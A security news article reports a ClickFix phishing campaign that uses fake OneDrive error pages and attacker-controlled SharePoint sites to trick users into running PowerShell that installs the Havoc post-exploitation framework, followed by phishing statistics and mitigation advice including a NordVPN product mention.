ClickFix Phishing Attack Exploits SharePoint to Deliver Havoc

An emerging ClickFix phishing scam is exploiting Microsoft SharePoint to lure victims into running PowerShell commands that install the Havoc post-exploitation framework. Uncovered by Fortinet’s FortiGuard Labs, the attack uses fraudulent OneDrive errors to deceive users into executing malicious scripts, giving attackers remote access to infected devices.

Hackers distribute phishing emails with a HTML attachment labeled “Documents.html.” When opened, it displays a fake OneDrive error (0x8004de86) and urges users to update their DNS cache. Clicking the “How to fix” button copies a PowerShell command to the clipboard and instructs users to paste it into command prompt.

Executing this command triggers another PowerShell script hosted on an attacker-controlled SharePoint server. To avoid analysis, the script first checks if the device is in a sandboxed environment. If it detects a virtualized environment, it shuts down. Otherwise, it modifies the Windows Registry, installs Python if missing, and retrieves and runs a Python script from the same SharePoint site.

The script then delivers Havoc, an open-source hacking tool used for post-exploitation and network infiltration. The malware injects Havoc as a DLL, allowing attackers to maintain control, spread within networks, and execute further malicious operations.

To avoid detection, the malware communicates with the attacker’s command-and-control (C2) infrastructure using Microsoft’s Graph API, disguising malicious activity as legitimate SharePoint traffic.

ClickFix phishing campaigns are growing in sophistication, helping deploy malware strains like infostealers, remote access trojans, and DarkGate. Cybercriminals are also expanding beyond email, leveraging platforms like Telegram, where they use fake identity verification services to trick users into running malicious PowerShell commands.

In Q3 2023, phishing attacks surged 173%, reaching 493.2 million incidents, a record-breaking rise. With 1.2% of all daily emails containing malicious content — amounting to 3.4 billion phishing emails globally — phishing remains a dominant cyber threat.

To mitigate these risks, organizations should educate employees on phishing tactics, enforce strict access controls, and monitor cloud services for anomalies. Solutions such as NordVPN’s AI-powered phishing prevention tool, Sonar, can help detect and block phishing threats. As attackers continue to exploit trusted platforms like Microsoft SharePoint, security teams must stay vigilant against evolving threats.